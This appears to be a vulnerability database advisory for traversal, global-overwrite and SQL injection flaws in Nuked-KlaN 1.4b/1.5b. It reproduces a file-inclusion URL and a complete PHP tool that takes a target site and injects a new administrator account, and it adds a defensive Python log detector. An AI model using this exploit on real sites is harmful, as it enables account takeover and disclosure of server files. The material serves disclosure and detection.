Nuked-Klan Multiple Vulnerabilities

Vulnerability ID: 1107865
Vulnerability type: Path traversal
Published: 2004-04-12
Updated: 2005-10-20
CVE ID: CVE-2004-1937
CNNVD-ID: CNNVD-200412-347
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/23988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-347
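|Vulnerability details
Nuked-KlaN versions 1.4b and 1.5b contain multiple directory traversal vulnerabilities. A remote attacker can read or include arbitrary files via .. sequences in (1) the user_langue parameter of index.php or (2) the langue parameter of update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) a .. sequence in the file parameter with the page parameter set to globals or (4) ../globals.php in the user_langue parameter.
|Exploit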
source: http://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------
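
A log check for the request patterns described above, as an added example that is not part of the original advisory or exploit: it flags `..` path segments in the `user_langue`, `langue` and `file` parameters and request-supplied `nuked[...]` or `GLOBALS` keys. The access-log format, the sample lines and the function name `findings` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as traversal sinks (index.php / update.php).
PATH_PARAMS = {"user_langue", "langue", "file"}
# Request-supplied nuked[...] or GLOBALS keys collide with the application's
# own configuration array once globals.php is pulled in (assumed pattern list).
GLOBAL_KEY = re.compile(r"^(nuked|GLOBALS)(\[|$)", re.IGNORECASE)
# Assumed Apache common/combined style request field.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def findings(log_line):
    """Return a sorted list of reasons this access-log line looks suspicious."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    reasons = set()
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes once, so %2e%2e%2f is evaluated as ../
    for name, value in parse_qsl(query, keep_blank_values=True):
        segments = re.split(r"[\\/]", value)
        if name in PATH_PARAMS and ".." in segments:
            reasons.add(f"traversal:{name}")
        if GLOBAL_KEY.match(name):
            reasons.add("global-overwrite:" + name.split("[")[0].lower())
    return sorted(reasons)


# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2004:10:00:01 +0000] "GET /index.php?file=News&op=index HTTP/1.0" 200 5120',
    '192.0.2.44 - - [12/Apr/2004:10:00:07 +0000] "GET /index.php?user_langue=../../../../../file/to/view HTTP/1.0" 200 812',
    '192.0.2.44 - - [12/Apr/2004:10:00:09 +0000] "GET /update.php?langue=%2e%2e%2f%2e%2e%2fconf HTTP/1.0" 200 301',
    '192.0.2.44 - - [12/Apr/2004:10:00:15 +0000] "GET /index.php?file=Suggest&user_langue=../globals.php&nuked%5Bprefix%5D=x HTTP/1.0" 200 77',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(findings(line) or "clean", "|", line.split('"')[1])
```

Parameters sent in a POST body do not appear in the access log, so this check only covers query strings.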
|References

Source: BID
Name: 10104
Link: http://www.securityfocus.com/bid/10104
Source: www.phpsecure.info
Link: http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
Source: XF
Name: nuked-klan-configurtion-corruption(15844)
Link: http://xforce.iss.net/xforce/xfdb/15844
Source: XF
Name: nuked-klan-file-include(15843)
Link: http://xforce.iss.net/xforce/xfdb/15843
Source: SECUNIA
Name: 11341
Link: http://secunia.com/advisories/11341
Source: BUGTRAQ
Name: 20040417 [SCSA-028] Nuked-Klan Multiple Vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108222826225823&w=2
